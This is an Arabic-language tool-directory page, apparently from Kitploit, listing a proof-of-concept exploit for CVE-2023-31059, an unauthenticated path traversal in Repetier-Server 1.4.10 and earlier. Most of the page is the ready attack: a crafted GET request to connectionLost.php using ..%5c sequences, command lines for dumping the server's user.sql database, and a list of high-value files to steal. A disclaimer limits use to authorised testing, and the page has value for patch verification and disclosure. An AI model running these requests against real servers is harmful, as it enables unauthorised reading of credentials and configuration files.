Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal — استغلال إثبات المفهوم لـ CVE-2023-31059، اجتياز مسار غير مصادق عليه في Repetier-Server ≤1.4.10، يمكن من قراءة ملفات تعسفية عبر طلبات HTTP مصممة. | Kitploit
أدوات/GitHubGitHub/mbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراقالتعلم والتعليم
GitHubmbanyamer/cve-2023-31059-repetier-server-1.4.10-unauthenticated-path-traversal

CVE-2023-31059-Repetier-Server-1.4.10-Unauthenticated-Path-Traversal

استغلال إثبات المفهوم لـ CVE-2023-31059، اجتياز مسار غير مصادق عليه في Repetier-Server ≤1.4.10، يمكن من قراءة ملفات تعسفية عبر طلبات HTTP مصممة.

عرض المستودع
1منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Repetier-Server <= 1.4.10

المؤلف: Mohammed Idrees Banyamer
الدور: باحث أمني
البلد: الأردن 🇯🇴


نظرة عامة

استغلال إثبات مفهوم لثغرة اجتياز المسار عن بُعد / تضمين الملفات المحلية (LFI) بدون مصادقة في Repetier‑Server ≤ 1.4.10.

تسمح الثغرة بقراءة ملفات تعسفية عبر تسلسلات ..%5c مُعدّة في نقطة النهاية connectionLost.php.


تفاصيل الثغرة

الحقلالقيمة
المنتجRepetier‑Server
الإصدارات المتأثرة≤ 1.4.10
CVECVE‑2023‑31059
النوعاجتياز المسار / تضمين الملفات المحلية (LFI)
المصادقةلا شيء
ناقل الهجومالشبكة
الأثرقراءة ملفات تعسفية
CVSS9.8 حرجة

تدفق هجوم إثبات المفهوم

root@kitploit:~
flowchart LR
    A[Attacker] -->|HTTP request with ..%5c traversal| B[Repetier Server]
    B --> C[base/connectionLost.php]
    C -->|Unsanitized file parameter| D[Windows Filesystem]
    D --> E[Sensitive File]
    E --> B
    B -->|File contents in HTTP response| A

مثال على الاستغلال

root@kitploit:~
GET /base/connectionLost.php?file=..%5c..%5cWindows%5cwin.ini HTTP/1.1
Host: target:3344

الاستخدام

root@kitploit:~
# Test vulnerability
python3 CVE-2023-31059.py http://<target-ip>:3344/ --test

# Extract user database
python3 CVE-2023-31059.py http://<target-ip>:3344/ \
  --file "ProgramData\\Repetier-Server\\database\\user.sql" \
  --depth 20

المتطلبات

root@kitploit:~
pip install requests

الأهداف عالية القيمة

root@kitploit:~
ProgramData\Repetier-Server\database\user.sql
ProgramData\Repetier-Server\config.xml
Windows\win.ini
Windows\System32\drivers\etc\hosts

إخلاء المسؤولية

يُقدَّم إثبات المفهوم هذا لأغراض تعليمية واختبارات أمنية مصرّح بها فقط. استخدمه فقط على الأنظمة التي تملكها أو لديك إذن صريح لاختبارها.


التواصل

GitHub: https://github.com/mbanyamer

تنزيل الأداة